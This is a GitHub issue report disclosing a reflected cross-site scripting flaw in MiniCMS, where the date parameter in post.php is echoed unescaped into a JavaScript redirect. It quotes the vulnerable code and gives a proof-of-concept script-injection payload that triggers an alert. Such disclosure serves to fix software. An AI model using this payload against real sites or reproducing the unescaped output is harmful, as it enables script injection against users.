Found an xss vulnerability in the date parameter of the post.php file

1、Download source code audit，It was found that the date parameter in the post.php file was not filtered during output.
```php
# line 245
function goto_page(e)
{
  var evt = e || window.event;
  var eventSrc = evt.target||evt.srcElement;

  if ((e.keyCode || e.which) == 13) {
    location.href = '?state=<?php echo $state; ?>&date=<?php echo $filter_date;?>&tag=<?php echo urlencode($filter_tag); ?>&page=' + eventSrc.value;
  }
}
```
<img width="1078" alt="image" src="https://github.com/bg5sbk/MiniCMS/assets/39737245/94689e92-3392-49d8-aa3e-2319d4c829dc">
<img width="1295" alt="image" src="https://github.com/bg5sbk/MiniCMS/assets/39737245/cd116d58-0d68-43fe-8f86-f138fff3c916">

2、payload and recurrence vulnerability
```
1111'</script><script>alert(1);</script>
```

<img width="1394" alt="image" src="https://github.com/bg5sbk/MiniCMS/assets/39737245/ffa032c6-7a56-4ab9-b8d9-84657f9a5f44">


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Found an xss vulnerability in the date parameter of the post.php file #47

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Found an xss vulnerability in the date parameter of the post.php file #47

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions